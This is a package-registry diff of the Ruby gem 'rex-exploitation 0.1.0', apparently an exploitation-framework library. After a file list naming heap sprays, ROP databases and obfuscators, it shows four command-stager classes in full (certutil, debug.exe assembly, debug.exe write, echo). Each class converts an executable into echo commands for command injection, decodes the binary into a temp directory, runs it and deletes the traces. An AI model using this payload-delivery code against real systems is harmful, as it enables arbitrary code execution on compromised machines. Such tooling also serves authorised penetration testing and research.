rex-exploitation 0.1.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (69) hide show
  1. checksums.yaml +7 -0
  2. checksums.yaml.gz.sig +0 -0
  3. data.tar.gz.sig +1 -0
  4. data/.gitignore +9 -0
  5. data/.rspec +2 -0
  6. data/.travis.yml +5 -0
  7. data/CODE_OF_CONDUCT.md +74 -0
  8. data/Gemfile +4 -0
  9. data/README.md +33 -0
  10. data/Rakefile +6 -0
  11. data/bin/console +14 -0
  12. data/bin/setup +8 -0
  13. data/data/exploits/cmdstager/debug_asm +91 -0
  14. data/data/exploits/cmdstager/debug_write +819 -0
  15. data/data/exploits/cmdstager/vbs_b64 +40 -0
  16. data/data/exploits/cmdstager/vbs_b64_adodb +50 -0
  17. data/data/exploits/cmdstager/vbs_b64_noquot +49 -0
  18. data/data/exploits/cmdstager/vbs_b64_sleep +41 -0
  19. data/data/js/detect/ie_addons.js +89 -0
  20. data/data/js/detect/misc_addons.js +157 -0
  21. data/data/js/detect/os.js +831 -0
  22. data/data/js/memory/explib2/lib/explib2.js +426 -0
  23. data/data/js/memory/explib2/payload/drop_exec.js +33 -0
  24. data/data/js/memory/explib2/payload/exec.js +10 -0
  25. data/data/js/memory/heap_spray.js +17 -0
  26. data/data/js/memory/heaplib2.js +192 -0
  27. data/data/js/memory/mstime_malloc.js +31 -0
  28. data/data/js/memory/property_spray.js +38 -0
  29. data/data/js/network/ajax_download.js +18 -0
  30. data/data/js/network/ajax_post.js +18 -0
  31. data/data/js/network/xhr_shim.js +15 -0
  32. data/data/js/utils/base64.js +126 -0
  33. data/data/ropdb/flash.xml +80 -0
  34. data/data/ropdb/hxds.xml +66 -0
  35. data/data/ropdb/java.xml +33 -0
  36. data/data/ropdb/msvcrt.xml +71 -0
  37. data/data/ropdb/reader.xml +132 -0
  38. data/data/ropdb/samba.xml +436 -0
  39. data/data/ropdb/stagefright.xml +225 -0
  40. data/lib/rex/exploitation.rb +7 -0
  41. data/lib/rex/exploitation/cmdstager.rb +11 -0
  42. data/lib/rex/exploitation/cmdstager/base.rb +189 -0
  43. data/lib/rex/exploitation/cmdstager/bourne.rb +118 -0
  44. data/lib/rex/exploitation/cmdstager/certutil.rb +114 -0
  45. data/lib/rex/exploitation/cmdstager/debug_asm.rb +139 -0
  46. data/lib/rex/exploitation/cmdstager/debug_write.rb +133 -0
  47. data/lib/rex/exploitation/cmdstager/echo.rb +166 -0
  48. data/lib/rex/exploitation/cmdstager/printf.rb +121 -0
  49. data/lib/rex/exploitation/cmdstager/tftp.rb +70 -0
  50. data/lib/rex/exploitation/cmdstager/vbs.rb +125 -0
  51. data/lib/rex/exploitation/egghunter.rb +423 -0
  52. data/lib/rex/exploitation/encryptjs.rb +79 -0
  53. data/lib/rex/exploitation/heaplib.js.b64 +331 -0
  54. data/lib/rex/exploitation/heaplib.rb +107 -0
  55. data/lib/rex/exploitation/js.rb +6 -0
  56. data/lib/rex/exploitation/js/detect.rb +70 -0
  57. data/lib/rex/exploitation/js/memory.rb +80 -0
  58. data/lib/rex/exploitation/js/network.rb +83 -0
  59. data/lib/rex/exploitation/js/utils.rb +32 -0
  60. data/lib/rex/exploitation/jsobfu.rb +17 -0
  61. data/lib/rex/exploitation/obfuscatejs.rb +336 -0
  62. data/lib/rex/exploitation/omelet.rb +321 -0
  63. data/lib/rex/exploitation/opcodedb.rb +819 -0
  64. data/lib/rex/exploitation/ropdb.rb +190 -0
  65. data/lib/rex/exploitation/seh.rb +93 -0
  66. data/lib/rex/exploitation/version.rb +5 -0
  67. data/rex-exploitation.gemspec +35 -0
  68. metadata +298 -0
  69. metadata.gz.sig +0 -0
@@ -0,0 +1,114 @@
1
+ # -*- coding: binary -*-
2
+
3
+ require 'rex/text'
4
+ require 'rex/arch'
5
+
6
+ module Rex
7
+ module Exploitation
8
+
9
+ ###
10
+ #
11
+ # This class provides the ability to create a sequence of commands from an executable.
12
+ # When this sequence is ran via command injection or a shell, the resulting exe will
13
+ # be written to disk and executed.
14
+ #
15
+ # This particular version uses Windows certutil to base64 decode a file,
16
+ # created via echo >>, and decode it to the final binary.
17
+ #
18
+ #
19
+ # Written by xistence
20
+ # Original discovery by @mattifestation - https://gist.github.com/mattifestation/47f9e8a431f96a266522
21
+ #
22
+ ###
23
+
24
+ class CmdStagerCertutil < CmdStagerBase
25
+
26
+ def initialize(exe)
27
+ super
28
+
29
+ @var_encoded = Rex::Text.rand_text_alpha(5)
30
+ @var_decoded = Rex::Text.rand_text_alpha(5)
31
+ @decoder = nil # filled in later
32
+ end
33
+
34
+
35
+ # Override just to set the extra byte count
36
+ # @param opts [Array] The options to generate the command line
37
+ # @return [Array] The complete command line
38
+ def generate_cmds(opts)
39
+ # Set the start/end of the commands here (vs initialize) so we have @tempdir
40
+ @cmd_start = "echo "
41
+ @cmd_end = ">>#{@tempdir}#{@var_encoded}.b64"
42
+ xtra_len = @cmd_start.length + @cmd_end.length + 1
43
+ opts.merge!({ :extra => xtra_len })
44
+ super
45
+ end
46
+
47
+
48
+ # Simple base64 encoder for the executable
49
+ # @param opts [Array] The options to generate the command line
50
+ # @return [String] Base64 encoded executable
51
+ def encode_payload(opts)
52
+ Rex::Text.encode_base64(@exe)
53
+ end
54
+
55
+
56
+ # Combine the parts of the encoded file with the stuff that goes
57
+ # before / after it.
58
+ # @param parts [Array] Splitted commands
59
+ # @param opts [Array] The options to generate the command line
60
+ # @return [Array] The command line
61
+ def parts_to_commands(parts, opts)
62
+
63
+ cmds = []
64
+ parts.each do |p|
65
+ cmd = ''
66
+ cmd << @cmd_start
67
+ cmd << p
68
+ cmd << @cmd_end
69
+ cmds << cmd
70
+ end
71
+
72
+ cmds
73
+ end
74
+
75
+
76
+ # Generate the commands that will decode the file we just created
77
+ # @param opts [Array] The options to generate the command line
78
+ # @return [Array] The certutil Base64 decoder part of the command line
79
+ def generate_cmds_decoder(opts)
80
+
81
+ cmds = []
82
+ cmds << "certutil -decode #{@tempdir}#{@var_encoded}.b64 #{@tempdir}#{@var_decoded}.exe"
83
+ return cmds
84
+ end
85
+
86
+
87
+ # We override compress commands just to stick in a few extra commands
88
+ # last second..
89
+ # @param cmds [Array] Complete command line
90
+ # @param opts [Array] Extra options for command line generation
91
+ # @return [Array] The complete command line including cleanup
92
+ def compress_commands(cmds, opts)
93
+ # Make it all happen
94
+ cmds << "#{@tempdir}#{@var_decoded}.exe"
95
+
96
+ # Clean up after unless requested not to..
97
+ if (not opts[:nodelete])
98
+ cmds << "del #{@tempdir}#{@var_encoded}.b64"
99
+ # NOTE: We won't be able to delete the exe while it's in use.
100
+ end
101
+
102
+ super
103
+ end
104
+
105
+ # Windows uses & to concat strings
106
+ #
107
+ # @return [String] Concat operator
108
+ def cmd_concat_operator
109
+ " & "
110
+ end
111
+
112
+ end
113
+ end
114
+ end
@@ -0,0 +1,139 @@
1
+ # -*- coding: binary -*-
2
+
3
+ require 'rex/text'
4
+ require 'rex/arch'
5
+
6
+ module Rex
7
+ module Exploitation
8
+
9
+ ###
10
+ #
11
+ # This class provides the ability to create a sequence of commands from an executable.
12
+ # When this sequence is ran via command injection or a shell, the resulting exe will
13
+ # be written to disk and executed.
14
+ #
15
+ # This particular version uses debug.exe to assemble a small COM file. The COM will
16
+ # take a hex-ascii file, created via echo >>, and decode it to the final binary.
17
+ #
18
+ # Requires: debug.exe
19
+ #
20
+ # Written by Joshua J. Drake
21
+ #
22
+ ###
23
+
24
+ class CmdStagerDebugAsm < CmdStagerBase
25
+
26
+ def initialize(exe)
27
+ super
28
+
29
+ @var_decoder_asm = Rex::Text.rand_text_alpha(8) + ".dat"
30
+ @var_decoder_com = Rex::Text.rand_text_alpha(8) + ".com"
31
+ @var_payload_in = Rex::Text.rand_text_alpha(8) + ".dat"
32
+ @var_payload_out = Rex::Text.rand_text_alpha(8) + ".exe"
33
+ @decoder = nil # filled in later
34
+ end
35
+
36
+
37
+ #
38
+ # Override just to set the extra byte count
39
+ #
40
+ def generate_cmds(opts)
41
+ # Set the start/end of the commands here (vs initialize) so we have @tempdir
42
+ @cmd_start = "echo "
43
+ @cmd_end = ">>#{@tempdir}#{@var_payload_in}"
44
+ xtra_len = @cmd_start.length + @cmd_end.length + 1
45
+ opts.merge!({ :extra => xtra_len })
46
+ super
47
+ end
48
+
49
+
50
+ #
51
+ # Simple hex encoding...
52
+ #
53
+ def encode_payload(opts)
54
+ ret = @exe.unpack('H*')[0]
55
+ end
56
+
57
+
58
+ #
59
+ # Combine the parts of the encoded file with the stuff that goes
60
+ # before / after it.
61
+ #
62
+ def parts_to_commands(parts, opts)
63
+
64
+ cmds = []
65
+ parts.each do |p|
66
+ cmd = ''
67
+ cmd << @cmd_start
68
+ cmd << p
69
+ cmd << @cmd_end
70
+ cmds << cmd
71
+ end
72
+
73
+ cmds
74
+ end
75
+
76
+
77
+ #
78
+ # Generate the commands that will decode the file we just created
79
+ #
80
+ def generate_cmds_decoder(opts)
81
+
82
+ # Allow decoder stub override (needs to input base64 and output bin)
83
+ @decoder = opts[:decoder] if (opts[:decoder])
84
+
85
+ # Read the decoder data file
86
+ f = File.new(@decoder, "rb")
87
+ decoder = f.read(f.stat.size)
88
+ f.close
89
+
90
+ # Replace variables
91
+ decoder.gsub!(/decoder_stub/, "#{@tempdir}#{@var_decoder_asm}")
92
+ decoder.gsub!(/h2b\.com/, "#{@tempdir}#{@var_decoder_com}")
93
+ # NOTE: these two filenames MUST 8+3 chars long.
94
+ decoder.gsub!(/testfile\.dat/, "#{@var_payload_in}")
95
+ decoder.gsub!(/testfile\.out/, "#{@var_payload_out}")
96
+
97
+ # Split it apart by the lines
98
+ decoder.split("\n")
99
+ end
100
+
101
+
102
+ #
103
+ # We override compress commands just to stick in a few extra commands
104
+ # last second..
105
+ #
106
+ def compress_commands(cmds, opts)
107
+ # Convert the debug script to an executable...
108
+ cvt_cmd = ''
109
+ if (@tempdir != '')
110
+ cvt_cmd << "cd %TEMP% && "
111
+ end
112
+ cvt_cmd << "debug < #{@tempdir}#{@var_decoder_asm}"
113
+ cmds << cvt_cmd
114
+
115
+ # Convert the encoded payload...
116
+ cmds << "#{@tempdir}#{@var_decoder_com}"
117
+
118
+ # Make it all happen
119
+ cmds << "start #{@tempdir}#{@var_payload_out}"
120
+
121
+ # Clean up after unless requested not to..
122
+ if (not opts[:nodelete])
123
+ cmds << "del #{@tempdir}#{@var_decoder_asm}"
124
+ cmds << "del #{@tempdir}#{@var_decoder_com}"
125
+ cmds << "del #{@tempdir}#{@var_payload_in}"
126
+ # XXX: We won't be able to delete the payload while it is running..
127
+ end
128
+
129
+ super
130
+ end
131
+
132
+ # Windows uses & to concat strings
133
+ def cmd_concat_operator
134
+ " & "
135
+ end
136
+
137
+ end
138
+ end
139
+ end
@@ -0,0 +1,133 @@
1
+ # -*- coding: binary -*-
2
+
3
+ require 'rex/text'
4
+ require 'rex/arch'
5
+
6
+ module Rex
7
+ module Exploitation
8
+
9
+ ###
10
+ #
11
+ # This class provides the ability to create a sequence of commands from an executable.
12
+ # When this sequence is ran via command injection or a shell, the resulting exe will
13
+ # be written to disk and executed.
14
+ #
15
+ # This particular version uses debug.exe to write a small .NET binary. That binary will
16
+ # take a hex-ascii file, created via echo >>, and decode it to the final binary.
17
+ #
18
+ # Requires: .NET, debug.exe
19
+ #
20
+ ###
21
+
22
+ class CmdStagerDebugWrite < CmdStagerBase
23
+
24
+ def initialize(exe)
25
+ super
26
+
27
+ @var_bypass = Rex::Text.rand_text_alpha(8)
28
+ @var_payload = Rex::Text.rand_text_alpha(8)
29
+ @decoder = nil # filled in later
30
+ end
31
+
32
+
33
+ #
34
+ # Override just to set the extra byte count
35
+ #
36
+ def generate_cmds(opts)
37
+ # Set the start/end of the commands here (vs initialize) so we have @tempdir
38
+ @cmd_start = "echo "
39
+ @cmd_end = ">>#{@tempdir}#{@var_payload}"
40
+ xtra_len = @cmd_start.length + @cmd_end.length + 1
41
+ opts.merge!({ :extra => xtra_len })
42
+ super
43
+ end
44
+
45
+
46
+ #
47
+ # Simple hex encoding...
48
+ #
49
+ def encode_payload(opts)
50
+ @exe.unpack('H*')[0]
51
+ end
52
+
53
+
54
+ #
55
+ # Combine the parts of the encoded file with the stuff that goes
56
+ # before / after it.
57
+ #
58
+ def parts_to_commands(parts, opts)
59
+
60
+ cmds = []
61
+ parts.each do |p|
62
+ cmd = ''
63
+ cmd << @cmd_start
64
+ cmd << p
65
+ cmd << @cmd_end
66
+ cmds << cmd
67
+ end
68
+
69
+ cmds
70
+ end
71
+
72
+
73
+ #
74
+ # Generate the commands that will decode the file we just created
75
+ #
76
+ def generate_cmds_decoder(opts)
77
+
78
+ # Allow decoder stub override (needs to input base64 and output bin)
79
+ @decoder = opts[:decoder] if (opts[:decoder])
80
+
81
+ # Read the decoder data file
82
+ f = File.new(@decoder, "rb")
83
+ decoder = f.read(f.stat.size)
84
+ f.close
85
+
86
+ # Replace variables
87
+ decoder.gsub!(/decoder_stub/, "#{@tempdir}#{@var_bypass}")
88
+
89
+ # Split it apart by the lines
90
+ decoder.split("\n")
91
+ end
92
+
93
+
94
+ #
95
+ # We override compress commands just to stick in a few extra commands
96
+ # last second..
97
+ #
98
+ def compress_commands(cmds, opts)
99
+ # Convert the debug script to an executable...
100
+ cvt_cmd = ''
101
+ if (@tempdir != '')
102
+ cvt_cmd << "cd %TEMP% && "
103
+ end
104
+ cvt_cmd << "debug < #{@tempdir}#{@var_bypass}"
105
+ cmds << cvt_cmd
106
+
107
+ # Rename the resulting binary
108
+ cmds << "move #{@tempdir}#{@var_bypass}.bin #{@tempdir}#{@var_bypass}.exe"
109
+
110
+ # Converting the encoded payload...
111
+ cmds << "#{@tempdir}#{@var_bypass}.exe #{@tempdir}#{@var_payload}"
112
+
113
+ # Make it all happen
114
+ cmds << "start #{@tempdir}#{@var_payload}.exe"
115
+
116
+ # Clean up after unless requested not to..
117
+ if (not opts[:nodelete])
118
+ cmds << "del #{@tempdir}#{@var_bypass}.exe"
119
+ cmds << "del #{@tempdir}#{@var_payload}"
120
+ # XXX: We won't be able to delete the payload while it is running..
121
+ end
122
+
123
+ super
124
+ end
125
+
126
+ # Windows uses & to concat strings
127
+ def cmd_concat_operator
128
+ " & "
129
+ end
130
+
131
+ end
132
+ end
133
+ end
@@ -0,0 +1,166 @@
1
+ # -*- coding: binary -*-
2
+
3
+ require 'rex/text'
4
+ require 'rex/arch'
5
+ require 'shellwords'
6
+
7
+ module Rex
8
+ module Exploitation
9
+
10
+ class CmdStagerEcho < CmdStagerBase
11
+
12
+ ENCODINGS = {
13
+ 'hex' => "\\\\x",
14
+ 'octal' => "\\\\"
15
+ }
16
+
17
+ def initialize(exe)
18
+ super
19
+
20
+ @var_elf = Rex::Text.rand_text_alpha(5)
21
+ end
22
+
23
+ #
24
+ # Override to ensure opts[:temp] is a correct *nix path
25
+ # and initialize opts[:enc_format].
26
+ #
27
+ def generate(opts = {})
28
+ opts[:temp] = opts[:temp] || '/tmp/'
29
+
30
+ unless opts[:temp].empty?
31
+ opts[:temp].gsub!(/\\/, '/')
32
+ opts[:temp] = opts[:temp].shellescape
33
+ opts[:temp] << '/' if opts[:temp][-1,1] != '/'
34
+ end
35
+
36
+ # by default use the 'hex' encoding
37
+ opts[:enc_format] = opts[:enc_format].nil? ? 'hex' : opts[:enc_format].to_s
38
+
39
+ unless ENCODINGS.keys.include?(opts[:enc_format])
40
+ raise RuntimeError, "CmdStagerEcho - Invalid Encoding Option: #{opts[:enc_format]}"
41
+ end
42
+
43
+ super
44
+ end
45
+
46
+ #
47
+ # Override to set the extra byte count
48
+ #
49
+ def generate_cmds(opts)
50
+ # Set the start/end of the commands here (vs initialize) so we have @tempdir
51
+ @cmd_start = "echo "
52
+ unless opts[:noargs]
53
+ @cmd_start += "-en "
54
+ end
55
+
56
+ @cmd_end = ">>#{@tempdir}#{@var_elf}"
57
+ xtra_len = @cmd_start.length + @cmd_end.length
58
+ opts.merge!({ :extra => xtra_len })
59
+
60
+ @prefix = opts[:prefix] || ENCODINGS[opts[:enc_format]]
61
+ min_part_size = 5 # for both encodings
62
+
63
+ if (opts[:linemax] - opts[:extra]) < min_part_size
64
+ raise RuntimeError, "CmdStagerEcho - Not enough space for command - #{opts[:extra] + min_part_size} byte required, #{opts[:linemax]} byte available"
65
+ end
66
+
67
+ super
68
+ end
69
+
70
+
71
+ #
72
+ # Encode into a format that echo understands, where
73
+ # interpretation of backslash escapes are enabled. For
74
+ # hex, it'll look like "\\x41\\x42", and octal will be
75
+ # "\\101\\102\\5\\41"
76
+ #
77
+ def encode_payload(opts)
78
+ case opts[:enc_format]
79
+ when 'octal'
80
+ return Rex::Text.to_octal(@exe, @prefix)
81
+ else
82
+ return Rex::Text.to_hex(@exe, @prefix)
83
+ end
84
+ end
85
+
86
+
87
+ #
88
+ # Combine the parts of the encoded file with the stuff that goes
89
+ # before ("echo -en ") / after (">>file") it.
90
+ #
91
+ def parts_to_commands(parts, opts)
92
+ parts.map do |p|
93
+ cmd = ''
94
+ cmd << @cmd_start
95
+ cmd << p
96
+ cmd << @cmd_end
97
+ cmd
98
+ end
99
+ end
100
+
101
+ #
102
+ # Since the binary has been already dropped to fs, just execute and
103
+ # delete it
104
+ #
105
+ def generate_cmds_decoder(opts)
106
+ cmds = []
107
+ # Make it all happen
108
+ cmds << "chmod 777 #{@tempdir}#{@var_elf}"
109
+ #cmds << "chmod +x #{@tempdir}#{@var_elf}"
110
+ cmds << "#{@tempdir}#{@var_elf}#{' & echo' if opts[:background]}"
111
+
112
+ # Clean up after unless requested not to..
113
+ unless opts[:nodelete]
114
+ cmds << "rm -f #{@tempdir}#{@var_elf}"
115
+ end
116
+
117
+ return cmds
118
+ end
119
+
120
+ #
121
+ # Override it to ensure that the hex representation of a byte isn't cut
122
+ #
123
+ def slice_up_payload(encoded, opts)
124
+ encoded_dup = encoded.dup
125
+
126
+ parts = []
127
+ xtra_len = opts[:extra]
128
+ xtra_len ||= 0
129
+ while (encoded_dup.length > 0)
130
+ temp = encoded_dup.slice(0, (opts[:linemax] - xtra_len))
131
+ # cut the end of the part until we reach the start
132
+ # of a full byte representation "\\xYZ" or "\\YZX"
133
+ temp = fix_last_byte(temp, opts, encoded_dup)
134
+ parts << temp
135
+ encoded_dup.slice!(0, temp.length)
136
+ end
137
+
138
+ parts
139
+ end
140
+
141
+ def fix_last_byte(part, opts, remaining="")
142
+ fixed_part = part.dup
143
+
144
+ case opts[:enc_format]
145
+ when 'hex'
146
+ while (fixed_part.length > 0 && fixed_part[-5, @prefix.length] != @prefix)
147
+ fixed_part.chop!
148
+ end
149
+ when 'octal'
150
+ if remaining.length > fixed_part.length and remaining[fixed_part.length, @prefix.length] != @prefix
151
+ pos = fixed_part.rindex('\\')
152
+ pos -= 1 if fixed_part[pos-1] == '\\'
153
+ fixed_part.slice!(pos..fixed_part.length-1)
154
+ end
155
+ end
156
+
157
+ return fixed_part
158
+ end
159
+
160
+ def cmd_concat_operator
161
+ " ; "
162
+ end
163
+
164
+ end
165
+ end
166
+ end